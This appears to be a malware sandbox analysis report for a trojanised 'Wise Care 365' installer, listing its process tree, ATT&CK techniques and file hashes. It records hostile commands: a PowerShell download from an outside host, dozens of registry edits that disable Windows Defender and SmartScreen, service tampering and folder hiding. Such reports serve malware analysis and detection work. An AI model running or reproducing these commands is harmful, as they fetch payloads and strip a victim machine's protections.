C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:976

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1352

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1820

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:388

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1728

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1452

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:536

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1948

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:472

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1888

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1484

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:856

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:892

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1052

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:2020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1732

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1992

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1204

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1792

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1980

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:764

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:1924

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1624

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:472

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1696

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1484

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:856

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:892

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2036

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:2020

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:608

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1356

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1712

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
PID:964

C:\Windows\SysWOW64\PING.EXE
Ping -n 1 127.0.0.1
4⤵
- Runs ping.exe
PID:1452

C:\Windows\SysWOW64\PING.EXE
Ping -n 3 127.0.0.1
4⤵
PID:536

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1176

C:\ProgramData\ConsoleApp\7za.exe
7za.exe x -y -p1r7d2kvUf3 "*.7z"
4⤵
- Executes dropped EXE
PID:1936

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ConsoleApp\ControlSet003.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:1680

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet001.bat" "
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1588

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
6⤵
PID:756

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
6⤵
PID:1472

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
6⤵
PID:320

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
6⤵
PID:1020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
6⤵
PID:544

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
6⤵
PID:1536

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
6⤵
PID:592

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
6⤵
PID:884

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
6⤵
PID:1052

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:1484

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
6⤵
PID:1776

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:1308

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
6⤵
PID:912

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
6⤵
PID:1732

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:1756

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1764

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
6⤵
PID:1736

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
6⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
6⤵
PID:1432

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
6⤵
PID:1128

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
6⤵
PID:1752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
6⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
6⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
6⤵
PID:1176

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
6⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
6⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
6⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:668

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:1096

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:928

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:1212

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:472

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:456

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender Real-time Protection settings
PID:1684

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
6⤵
PID:948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1532

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1792

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1828

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
6⤵
PID:1952

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
6⤵
PID:1912

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
PID:1572

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
6⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:1076

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
6⤵
PID:1836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
6⤵
PID:388

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
6⤵
PID:1556

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
6⤵
PID:1900

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
6⤵
PID:616

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
6⤵
PID:1884

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:240

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
6⤵
PID:1204

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
6⤵
PID:1196

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
6⤵
PID:1128

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
6⤵
PID:1728

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
6⤵
PID:1628

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
6⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
6⤵
PID:1784

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
6⤵
PID:1972

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
6⤵
PID:1944

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
6⤵
PID:1920

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
6⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
6⤵
PID:1924

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
6⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
6⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
6⤵
PID:668

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:756

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
6⤵
- Modifies Windows Defender notification settings
PID:1212

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
6⤵
PID:472

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1696

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1492

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:948

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
PID:824

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\executer.bat" "
5⤵
- Loads dropped DLL
PID:1332

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:1740

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e file.zip -p___________24671pwd16377pwd22378___________ -oextracted
6⤵
- Executes dropped EXE
PID:1940

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:1660

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:1696

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:1484

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:1076

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:2036

C:\ProgramData\ConsoleApp\ielowutil.exe
"ielowutil.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
7⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:964

C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe
"C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1536

C:\Users\Admin\AppData\Local\Temp\umciavi32.exe
"C:\Users\Admin\AppData\Local\Temp\umciavi32.exe"
8⤵
- Executes dropped EXE
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
9⤵
PID:756

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
10⤵
- Modifies file permissions
PID:1680

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
10⤵
- Modifies file permissions
PID:1088

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
10⤵
- Modifies file permissions
PID:1192

C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe
"C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe"
8⤵
- Executes dropped EXE
PID:1824

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:1752

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:1736

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:1052

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:1020

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "
5⤵
PID:1308

C:\Windows\SysWOW64\timeout.exe
timeout /T 90 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1352

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\ConsoleApp\"
6⤵
PID:1608

C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:828

C:\Users\Admin\AppData\Local\Temp\is-396IB.tmp\Wise Care 365 5.9.1.582.exe
"C:\Users\Admin\AppData\Local\Temp\is-396IB.tmp\Wise Care 365 5.9.1.582.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1936

C:\Users\Admin\AppData\Local\Temp\is-9J2Q0.tmp\Wise Care 365 5.9.1.582.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9J2Q0.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$201BA,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-396IB.tmp\Wise Care 365 5.9.1.582.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1904

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220609201254.log C:\Windows\Logs\CBS\CbsPersist_20220609201254.cab
1⤵
- Drops file in Windows directory
PID:1920

C:\Windows\system32\taskeng.exe
taskeng.exe {95A4F85D-84C9-44A9-B719-CB313CA72ABF} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]
1⤵
PID:1084

C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe
2⤵
PID:1700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

BITS Jobs

T1197

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Permissions Modification

T1222

BITS Jobs

T1197

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Query Registry

T1012

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ConsoleApp\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
Filesize
572KB

MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
